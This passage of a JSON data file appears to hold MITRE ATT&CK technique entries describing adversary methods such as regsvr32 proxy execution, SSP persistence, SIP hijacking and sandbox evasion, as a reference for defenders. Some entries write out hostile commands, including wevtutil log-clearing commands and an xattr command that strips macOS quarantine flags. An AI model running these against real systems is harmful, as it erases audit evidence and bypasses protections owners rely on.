HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example:\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)","tactics":["persistence"],"externalId":"T1042","externalUrl":"https://attack.mitre.org/techniques/T1042"},"key":"mitre/change-default-file-association"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Regsvr32","version":"1.1","description":"Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)","tactics":["defense-evasion","execution"],"externalId":"T1117","externalUrl":"https://attack.mitre.org/techniques/T1117"},"key":"mitre/regsvr32"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Re-opened Applications","version":"1.0","description":"Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).","tactics":["persistence"],"externalId":"T1164","externalUrl":"https://attack.mitre.org/techniques/T1164"},"key":"mitre/re-opened-applications"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Indicator Blocking","version":"1.0","description":"An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include modifying sensor settings stored in configuration files and/or Registry keys to disable or maliciously redirect event telemetry. (Citation: Microsoft Lamin Sept 2017)\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.","tactics":["defense-evasion"],"externalId":"T1054","externalUrl":"https://attack.mitre.org/techniques/T1054"},"key":"mitre/indicator-blocking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Redundant Access","version":"1.0","description":"Adversaries may use more than one remote access tool with varying command and control protocols as a hedge against detection. If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network. (Citation: Mandiant APT1)\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.","tactics":["defense-evasion","persistence"],"externalId":"T1108","externalUrl":"https://attack.mitre.org/techniques/T1108"},"key":"mitre/redundant-access"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Spearphishing Attachment","version":"1.0","description":"Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.","tactics":["initial-access"],"externalId":"T1193","externalUrl":"https://attack.mitre.org/techniques/T1193"},"key":"mitre/spearphishing-attachment"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Kernel Modules and Extensions","version":"1.0","description":"Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)\n\nCommon features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)","tactics":["persistence"],"externalId":"T1215","externalUrl":"https://attack.mitre.org/techniques/T1215"},"key":"mitre/kernel-modules-and-extensions"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Security Support Provider","version":"1.0","description":"Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.\n (Citation: Graeber 2014)","tactics":["persistence"],"externalId":"T1101","externalUrl":"https://attack.mitre.org/techniques/T1101"},"key":"mitre/security-support-provider"},{"type":"mitre","subtype":"technique","metadata":{"technique":"LSASS Driver","version":"1.0","description":"The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.","tactics":["execution","persistence"],"externalId":"T1177","externalUrl":"https://attack.mitre.org/techniques/T1177"},"key":"mitre/lsass-driver"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Video Capture","version":"1.0","description":"An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)","tactics":["collection"],"externalId":"T1125","externalUrl":"https://attack.mitre.org/techniques/T1125"},"key":"mitre/video-capture"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Gatekeeper Bypass","version":"1.0","description":"In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. \n\nApps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, other utilities or events like drive-by downloads don’t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)\n \nIn typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)","tactics":["defense-evasion"],"externalId":"T1144","externalUrl":"https://attack.mitre.org/techniques/T1144"},"key":"mitre/gatekeeper-bypass"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Software Packing","version":"1.0","description":"Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.\n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.","tactics":["defense-evasion"],"externalId":"T1045","externalUrl":"https://attack.mitre.org/techniques/T1045"},"key":"mitre/software-packing"},{"type":"mitre","subtype":"technique","metadata":{"technique":"System Network Configuration Discovery","version":"1.0","description":"Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).","tactics":["discovery"],"externalId":"T1016","externalUrl":"https://attack.mitre.org/techniques/T1016"},"key":"mitre/system-network-configuration-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"SIP and Trust Provider Hijacking","version":"1.0","description":"In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)","tactics":["defense-evasion","persistence"],"externalId":"T1198","externalUrl":"https://attack.mitre.org/techniques/T1198"},"key":"mitre/sip-and-trust-provider-hijacking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Account Discovery","version":"1.0","description":"Adversaries may attempt to get a listing of local system or domain accounts. \n\n### Windows\n\nExample commands that can acquire this information are net user, net group , and net localgroup  using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.\n\n### Mac\n\nOn Mac, groups can be enumerated through the groups and id commands. In mac specifically, dscl . list /Groups and dscacheutil -q group can also be used to enumerate groups and users.\n\n### Linux\n\nOn Linux, local users can be enumerated through the use of the /etc/passwd file which is world readable. In mac, this same file is only used in single-user mode in addition to the /etc/master.passwd file.\n\nAlso, groups can be enumerated through the groups and id commands.","tactics":["discovery"],"externalId":"T1087","externalUrl":"https://attack.mitre.org/techniques/T1087"},"key":"mitre/account-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Connection Proxy","version":"1.0","description":"A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)\n\nThe definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.","tactics":["command-and-control"],"externalId":"T1090","externalUrl":"https://attack.mitre.org/techniques/T1090"},"key":"mitre/connection-proxy"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Command-Line Interface","version":"1.0","description":"Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)).\n\nAdversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.","tactics":["execution"],"externalId":"T1059","externalUrl":"https://attack.mitre.org/techniques/T1059"},"key":"mitre/command-line-interface"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Domain Trust Discovery","version":"1.0","description":"Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008) opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)","tactics":["discovery"],"externalId":"T1482","externalUrl":"https://attack.mitre.org/techniques/T1482"},"key":"mitre/domain-trust-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Distributed Component Object Model","version":"1.0","description":"Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL) (Citation: Microsoft Process Wide Com Keys) (Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.\n\nAdversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods. (Citation: Enigma MMC20 COM Jan 2017) (Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.\n\nDCOM may also expose functionalities that can be leveraged during other areas of the adversary chain of activity such as Privilege Escalation and Persistence. (Citation: ProjectZero File Write EoP Apr 2018)","tactics":["lateral-movement"],"externalId":"T1175","externalUrl":"https://attack.mitre.org/techniques/T1175"},"key":"mitre/distributed-component-object-model"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Automated Exfiltration","version":"1.0","description":"Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [Scripting](https://attack.mitre.org/techniques/T1064) after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).","tactics":["exfiltration"],"externalId":"T1020","externalUrl":"https://attack.mitre.org/techniques/T1020"},"key":"mitre/automated-exfiltration"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Indicator Removal on Host","version":"1.0","description":"Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* .\n\nActions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.\n\n### Clear Windows Event Logs\n\nWindows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as \"any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log.\" There are three system-defined sources of Events: System, Application, and Security.\n \nAdversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nLogs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).","tactics":["defense-evasion"],"externalId":"T1070","externalUrl":"https://attack.mitre.org/techniques/T1070"},"key":"mitre/indicator-removal-on-host"},{"type":"mitre","subtype":"technique","metadata":{"technique":"File and Directory Discovery","version":"1.0","description":"Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \n\n### Windows\n\nExample utilities used to obtain this information are dir and tree. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.\n\n### Mac and Linux\n\nIn Mac and Linux, this kind of discovery is accomplished with the ls, find, and locate commands.","tactics":["discovery"],"externalId":"T1083","externalUrl":"https://attack.mitre.org/techniques/T1083"},"key":"mitre/file-and-directory-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Application Shimming","version":"1.0","description":"The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.","tactics":["persistence","privilege-escalation"],"externalId":"T1138","externalUrl":"https://attack.mitre.org/techniques/T1138"},"key":"mitre/application-shimming"},{"type":"mitre","subtype":"technique","metadata":{"technique":"CMSTP","version":"1.0","description":"The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)","tactics":["defense-evasion","execution"],"externalId":"T1191","externalUrl":"https://attack.mitre.org/techniques/T1191"},"key":"mitre/cmstp"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Multi-hop Proxy","version":"1.0","description":"To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.","tactics":["command-and-control"],"externalId":"T1188","externalUrl":"https://attack.mitre.org/techniques/T1188"},"key":"mitre/multi-hop-proxy"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data Staged","version":"1.0","description":"Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).\n\nInteractive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.","tactics":["collection"],"externalId":"T1074","externalUrl":"https://attack.mitre.org/techniques/T1074"},"key":"mitre/data-staged"},{"type":"mitre","subtype":"technique","metadata":{"technique":"System Network Connections Discovery","version":"1.0","description":"Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\n### Windows\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039).\n\n### Mac and Linux \n\nIn Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\".","tactics":["discovery"],"externalId":"T1049","externalUrl":"https://attack.mitre.org/techniques/T1049"},"key":"mitre/system-network-connections-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Scripting","version":"1.0","description":"Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)","tactics":["defense-evasion","execution"],"externalId":"T1064","externalUrl":"https://attack.mitre.org/techniques/T1064"},"key":"mitre/scripting"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Shared Webroot","version":"1.0","description":"Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.\n\nThis mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)","tactics":["lateral-movement"],"externalId":"T1051","externalUrl":"https://attack.mitre.org/techniques/T1051"},"key":"mitre/shared-webroot"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Virtualization/Sandbox Evasion","version":"1.0","description":"Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. \n\nAdversaries may use several methods including [Security Software Discovery](https://attack.mitre.org/techniques/T1063) to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. (Citation: Unit 42 Pirpi July 2015)\n\n###Virtual Machine Environment Artifacts Discovery###\n\nAdversaries may use utilities such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1086), [Systeminfo](https://attack.mitre.org/software/S0096), and the [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, 